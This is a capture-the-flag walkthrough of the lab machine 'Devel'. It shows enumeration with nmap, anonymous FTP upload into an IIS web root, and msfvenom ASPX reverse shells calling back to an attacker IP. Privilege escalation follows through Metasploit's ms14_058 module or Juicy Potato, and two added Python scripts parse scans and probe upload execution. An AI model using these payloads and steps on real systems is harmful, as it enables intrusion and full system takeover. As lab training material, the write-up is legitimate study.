Devel
Below are the steps involved in the Devel machine CTF:
Enumeration and Scanning (Information Gathering).
Initial Foothold.
Privilege Escalation.

Enumeration
Let's run an nmap scan on the default ports to see what services are running on the target system.
#nmap -sC -sV -oA nmap/Devel1 10.10.10.5
-sC - Default scripts
-sV - Service version scanning
-oA - To save the output

Next, we can run nmap's vulnerability scripts against the target to flag known issues in the identified services. These scans are slow and noisy and the "vuln" category produces false positives, so treat the output as leads to verify rather than findings.
nmap -sV -A -p- --script vuln 10.10.10.5
nmap -n -v -sT -A 10.10.10.5 --script vuln

-sV - Service version detection
-A - Aggressive scan (OS detection, version detection, script scanning and traceroute)
-p- - Scan all 65535 TCP ports
--script vuln - Run the NSE scripts in the "vuln" category

Two alternative scans that add OS detection and a full-port sweep:
nmap -sC -sV -O -oA nmap/devel 10.10.10.5
nmap -sC -sV -p- -T4 -oN devel_full_scan 10.10.10.5

We found FTP running on port 21 and HTTP running on port 80. Anonymous login is allowed on the target's FTP server, and nmap's ftp-anon script lists the directory contents: iisstart.htm, welcome.png and a directory aspnet_client. Those are the default files of an IIS site, which already hints that the FTP root and the web root are the same directory. Let's get on to the HTTP server and see what we have on it.
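The scans above were saved with -oA, which also writes an XML report. The script below is an added example, not part of the original write-up: it parses that XML (nmap's documented schema, read with the standard library) to list open ports with their service banners and to flag hosts where the ftp-anon script confirmed anonymous login. SAMPLE_XML is constructed by hand to mirror what the scan of 10.10.10.5 returns; the product and version strings and the filtered port 445 are illustrative.

```python
"""Extract open ports, banners and anonymous-FTP findings from an nmap XML report.

Added example (not from the original write-up). Run as:
    python nmap_findings.py nmap/Devel1.xml
With no argument it parses the constructed SAMPLE_XML below.
"""
import sys
import xml.etree.ElementTree as ET

# Constructed sample mirroring nmap's XML schema for the Devel scan.
# nmap encodes newlines inside the script "output" attribute as &#xa;.
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -sC -sV -oA nmap/Devel1 10.10.10.5">
  <host>
    <address addr="10.10.10.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open" reason="syn-ack"/>
        <service name="ftp" product="Microsoft ftpd" method="probed"/>
        <script id="ftp-anon" output="Anonymous FTP login allowed (FTP code 230)&#xa;| aspnet_client&#xa;| iisstart.htm&#xa;|_welcome.png"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Microsoft IIS httpd" version="7.5" method="probed"/>
        <script id="http-title" output="IIS7"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="filtered" reason="no-response"/>
        <service name="microsoft-ds" method="table"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_open_ports(xml_text):
    """Return one dict per port in state 'open'; closed/filtered ports are skipped.

    Each dict carries host, port, proto, service, product, version and a
    {script_id: output} map of the NSE scripts that ran against that port.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            findings.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name", "") if svc is not None else "",
                "product": svc.get("product", "") if svc is not None else "",
                "version": svc.get("version", "") if svc is not None else "",
                "scripts": {s.get("id"): s.get("output", "") for s in port.iter("script")},
            })
    return findings


def anonymous_ftp_hosts(findings):
    """Hosts where ftp-anon reported a successful anonymous login (FTP code 230)."""
    return sorted({
        f["host"] for f in findings
        if f["service"] == "ftp"
        and "Anonymous FTP login allowed" in f["scripts"].get("ftp-anon", "")
    })


def summarize(findings):
    """One 'host:port/proto service banner' line per open port."""
    lines = []
    for f in findings:
        banner = " ".join(x for x in (f["product"], f["version"]) if x)
        lines.append(("%s:%d/%s %s %s" % (f["host"], f["port"], f["proto"],
                                           f["service"], banner)).rstrip())
    return lines


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    found = parse_open_ports(text)
    print("\n".join(summarize(found)))
    for h in anonymous_ftp_hosts(found):
        print("[!] anonymous FTP login allowed on %s - check for write access" % h)
```

The anonymous-FTP check keys on the literal "Anonymous FTP login allowed" string that the ftp-anon script emits on a 230 reply, so a server that merely accepts the USER command but rejects the login is not flagged.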

We have the IIS7 default page. If we look at the source of the web page, we can see that the image welcome.png is referenced without a full path, which means the image sits in the same directory the page is served from. We also saw welcome.png on the FTP server. So let's log in to FTP, check whether we have write access by putting a file there, and see if we can reach that file through the web server.

ftp 10.10.10.5

Let's see if we can access it on the web.

Yes, we are able to access the test page. Let's generate an ASPX shell and upload it the same way; if IIS executes it, we should get a reverse shell.
Initial Foothold
Let's generate an ASPX reverse shell using msfvenom.
msfvenom -p windows/shell_reverse_tcp LHOST="10.10.16.4" LPORT=4444 -f aspx > shell.aspx

Let's upload it over FTP.

Let's start a listener on the port we used when generating the reverse shell (rlwrap gives the raw shell line editing and history).
rlwrap nc -lvnp 4444


And we got a reverse shell.
Privilege Escalation
Let's see which user our shell is running as.
whoami

Right now we are the default IIS application-pool user, which has very limited rights on the machine. Let's enumerate from within to get a better insight. First, systeminfo.
systeminfo

We can see that it's Windows 7 Enterprise, build 6.1.7600 (the RTM build, no service pack).
Let's see if there are privilege escalation exploits for this version. By a simple Google search, I got this exploit:
Let's first try the Metasploit route to capture the flags.
Nmap revealed that ports 21 and 80 are open: Microsoft FTP Server on port 21 and Microsoft IIS on port 80. The ftp-anon script reported that anonymous login is allowed, so as usual we try the credentials anonymous : anonymous.
FTP Anonymous Login
$ ftp 10.10.10.5
User ID :anonymous
Password :anonymous

ftp > ls

Once logged in anonymously, we list the contents of the FTP folder and find iisstart.htm and welcome.png. These look like the files of the web server running on port 80, and browsing to http://10.10.10.5/iisstart.htm and http://10.10.10.5/welcome.png confirms that the FTP folder is the web root. We then upload a simple text file over FTP; the upload succeeds and the file is served at http://10.10.10.5/myfile.txt. Next we upload a PHP web shell, shell.php. The upload succeeds, but requesting it at http://10.10.10.5/shell.php returns a 404 error.
The 404 is most likely because PHP is not installed on the web server: IIS has no handler for .php, so it refuses to serve the file. Since it is IIS, it normally hosts ASP or ASPX content. We upload an .aspx test file and it is served at http://10.10.10.5/aspxfile.aspx, so we have confirmed that we can upload an ASPX file and have IIS process it. We therefore generate an ASPX reverse shell with msfvenom and upload it over FTP. A list of reverse shell one-liners is in the cheat sheet linked below.
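The txt / php / aspx experiment above is the whole foothold in miniature: does the anonymous FTP root overlap the web root, and which file types does IIS execute rather than serve back raw? The script below is an added example, not code from the original write-up. It automates that check by uploading three small probe files and classifying what comes back: a file that returns byte-for-byte is served raw, a 404 means no handler, and a `<%= 6*7 %>` page that comes back as "42" with no source markers proves server-side execution. The target IP and anonymous:anonymous credentials are taken from the write-up; the probe file names, their content and the verdict strings are this script's own choices.

```python
"""Check whether an anonymous-write FTP root is the IIS web root and which
uploaded file types execute server-side.

Added example (not from the original write-up). Assumptions: target and
anonymous credentials as in the write-up; probe names are arbitrary.
"""
import ftplib
import io
import urllib.error
import urllib.request

# name -> (bytes to upload, marker that appears only if the file is EXECUTED)
# The .txt probe should come back unchanged (served raw).
# The .php probe on IIS without a PHP handler is normally refused (404).
# The .aspx probe returns "42" instead of its "<%= 6*7 %>" source if IIS runs it.
PROBES = {
    "probe_raw.txt": (b"ftp-to-web-probe", None),
    "probe_exec.php": (b"<?php echo 6*7; ?>", "42"),
    "probe_exec.aspx": (b"<%= 6*7 %>", "42"),
}


def http_fetch(url):
    """Return (status, body) for a GET; 4xx/5xx are returned, not raised."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()


def classify(uploaded, status, body, marker):
    """Decide how the web server handled an uploaded file."""
    if status != 200:
        return "not served (HTTP %d)" % status
    if body == uploaded:
        return "served raw (not executed)"
    executed = (marker is not None and marker.encode() in body
                and b"<%" not in body and b"<?" not in body)
    if executed:
        return "EXECUTED server-side"
    return "served, content altered (HTTP 200)"


def probe_ftp_webroot(ftp, base_url, fetch=http_fetch, probes=PROBES):
    """Upload each probe through an already logged-in ftplib.FTP-like object,
    fetch it over HTTP from base_url and return {name: verdict}."""
    results = {}
    base = base_url.rstrip("/") + "/"
    for name, (content, marker) in probes.items():
        ftp.storbinary("STOR " + name, io.BytesIO(content))
        status, body = fetch(base + name)
        results[name] = classify(content, status, body, marker)
    return results


if __name__ == "__main__":
    TARGET = "10.10.10.5"
    ftp = ftplib.FTP(TARGET, timeout=10)
    ftp.login("anonymous", "anonymous")
    for name, verdict in probe_ftp_webroot(ftp, "http://%s/" % TARGET).items():
        print("%-18s %s" % (name, verdict))
    ftp.quit()
```

The execution check deliberately demands both the computed marker and the absence of "<%" / "<?" in the response: a server that serves the .aspx source as plain text would still contain "6*7" and the tag markers, so it is reported as raw rather than executed. Note that the probes are left on the target; delete them over FTP once you are done.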
Create Reverse Shell Using below command.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.2 LPORT=4444 -f aspx > reverse.aspx
https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/msfvenom
Note: If you get errors with the non-staged payload windows/meterpreter_reverse_tcp, use the staged payload windows/meterpreter/reverse_tcp in reverse.aspx instead. Either way, set the same payload on the exploit/multi/handler listener.

Upload the payload To FTP
ftp> put reverse.aspx

Once reverse.aspx is on the web server, the next step is to start a listener in msfconsole with the matching payload. So we start exploit/multi/handler with the payload set in one window and request http://10.10.10.5/reverse.aspx in another, with curl or directly in the browser.
Start Listener
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.16.2
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > exploit
Open URL
curl http://10.10.10.5/reverse.aspx (or open the link directly in the browser)


We can clearly see that we got a meterpreter shell. Ran some basic meterpreter commands.
meterpreter > sysinfo

meterpreter > getuid

Meterpreter's getuid command returns IIS APPPOOL\Web, so we need to escalate privileges before we can read the root flag.
Privilege Escalation
Finding PrivEsc Vector
To find a privilege escalation vector we use post/multi/recon/local_exploit_suggester. This post-exploitation module runs the check routines of Metasploit's local exploits (kernel and other local privilege escalation modules) against the current session and reports which ones the target appears vulnerable to. To use it, first background the meterpreter session:
meterpreter > background
or press CTRL + Z inside meterpreter.

Then locate the module:
msf5 exploit(multi/handler) > search suggester
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester

and run it against the backgrounded session:
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 3
msf5 post(multi/recon/local_exploit_suggester) > exploit
This lists the local exploits whose patch is not installed on the Devel machine. The check is heuristic, so expect some of the candidates to fail when actually run.

local_exploit_suggester lists a number of local privilege escalation exploits, so our privilege escalation vector is a kernel exploit. Trying the modules one by one, windows/local/ms14_058_track_popup_menu was the one that escalated our privileges to SYSTEM.

msf5 post(multi/recon/local_exploit_suggester) > use windows/local/ms14_058_track_popup_menu
msf5 exploit(windows/local/ms14_058_track_popup_menu) > set LHOST 10.10.16.2
msf5 exploit(windows/local/ms14_058_track_popup_menu) > set SESSION 3
msf5 exploit(windows/local/ms14_058_track_popup_menu) > exploit

meterpreter > getuid

We are NT AUTHORITY\SYSTEM now, the highest privilege on Windows, above even the Administrator account. It is time to grab the flags. But first let's drop from meterpreter into a cmd prompt so we can run normal Windows commands.
Upgrading The Shell

Navigate the user and root directories


Capture the User Flag

Capture the Root Flag


Devel - without Metasploit
Create the shell payload using the command below.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.2 LPORT=4242 -f aspx > shell.aspx

Connect to FTP, upload the shell.aspx payload, and request it in the web browser while the netcat listener runs in parallel.


Run this in a terminal before requesting the page:
rlwrap nc -lvnp 4242
Once the page is requested you will get the shell.

And we got a reverse shell.
Privilege Escalation
Let's see which user our shell is running as.

Right now we are the default IIS application-pool user, which has very limited rights on the machine. Let's enumerate from within to get a better insight. First, systeminfo.
systeminfo

We can see that it's Windows 7 Enterprise, build 6.1.7600.
Let's see if there are privilege escalation exploits for this version. By a simple Google search, I got this exploit:
Without Metasploit, a reliable route is token impersonation with the Juicy Potato exploit. It works because the IIS application-pool account holds SeImpersonatePrivilege, which Juicy Potato abuses to obtain a SYSTEM token; on a 32-bit target like this one, use the x86 build:
https://github.com/ivanitlearning/Juicy-Potato-x86/releases
Upload the exploit over FTP.
Juicy Potato needs a second payload to launch with the SYSTEM token, so create another reverse shell, this time as an executable:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.2 LPORT=443 -f exe > shell.exe



Now open a terminal and start a netcat listener on port 443. In the existing low-privileged shell, navigate to the directory the FTP uploads landed in (the IIS web root), where both files now are.

Now run the Juicy Potato executable with the command below. -p is the program to launch with the stolen SYSTEM token (our shell.exe), -t * tries both CreateProcessWithTokenW and CreateProcessAsUser, -c is the CLSID of a COM service that runs as SYSTEM on Windows 7, and -l is the local port Juicy Potato's COM server listens on. The -l port does not have to match the reverse shell port, which is baked into shell.exe; using 443 for both is just a convention here.
Juicy.Potato.x86.exe -l 443 -p shell.exe -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}